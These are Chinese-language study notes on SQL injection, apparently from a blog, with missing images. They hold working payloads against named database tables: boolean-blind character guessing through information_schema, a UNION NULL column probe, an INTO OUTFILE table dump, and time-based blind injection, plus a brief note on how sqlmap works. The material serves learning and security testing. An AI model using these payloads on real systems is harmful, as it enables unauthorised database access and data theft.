测试如下:
select * from sdb_b2c_orders where order_id = '201610081070741' and (select * from sdb_b2c_members)#' and member_id = '13950'
Paste_Image.png
通过这条语句 是否有返回来确定要猜的数据库的名称的第一个字母的 ascii码是多少
select * from ds.destoon_ad where aid = 2 AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1),1,1)) > 112;
121
select ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1),1,2))
SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1
select IFNULL(CAST(schema_name AS CHAR),CHAR(32)) FROM information_schema.SCHEMATA limit 21,1
information_schema.SCHEMATA表是关键
猜表的列数:
一共猜十列: sqlmap中
select * from ds.destoon_ad where aid = 2 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
select count(*) from information_schema.columns where table_schema='ds' and table_name='destoon_ad'
直接下载下来数据:
SELECT title,pid,typeid INTO OUTFILE 'tmp.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' FROM destoon_ad;
代码不报错 也可以注入:sleep函数帮你忙
Time-based blind SQL injection(基于时间延迟注入):
Paste_Image.png
Paste_Image.png
SQLMAP原理:
根据正确情况下返回的结果 和 错误下返回的结果 进行比较
Paste_Image.png
Paste_Image.png
Paste_Image.png
